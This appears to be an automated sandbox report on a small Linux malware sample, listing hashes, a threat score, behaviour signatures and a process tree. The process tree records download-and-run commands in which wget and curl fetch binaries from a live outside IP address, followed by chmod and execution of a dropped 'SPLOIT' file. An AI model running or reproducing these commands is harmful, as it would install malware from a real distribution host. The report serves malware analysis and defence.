Analysis

  • max time kernel
    139s
  • max time network
    148s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    29-07-2024 05:16

General

  • Target

    3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118

  • Size

    2KB

  • MD5

    3964a03b43bd29681a1cbabe37ff0be5

  • SHA1

    45077644cf8c6a6356a4b8a633618ab7d994ff63

  • SHA256

    06a10886d5e417be9f942bae7221d301552d490f2c4914e163a766ec4731cbeb

  • SHA512

    0e364a22d00875879d5b6af408891ff34e39db6a48f19fd1208a40507b88d60274b9416813bddff6e334933ec52553d94a5339459f9d314beda98b33fcf911a6

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
    /tmp/3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
    1⤵
    • Writes file to tmp directory
    PID:643
    • /usr/bin/wget
      wget http://185.172.111.210/bins/GOOGLE.x86
      2⤵
        PID:644
      • /usr/bin/curl
        curl -O http://185.172.111.210/bins/GOOGLE.x86
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        PID:652
      • /bin/cat
        cat GOOGLE.x86
        2⤵
          PID:682
        • /bin/chmod
          chmod +x 3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118 SPLOIT
          2⤵
            PID:683
          • /tmp/SPLOIT
            ./SPLOIT x86.GOOGLE
            2⤵
            • Executes dropped EXE
            PID:684
          • /usr/bin/wget
            wget http://185.172.111.210/bins/GOOGLE.mips
            2⤵
              PID:686

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads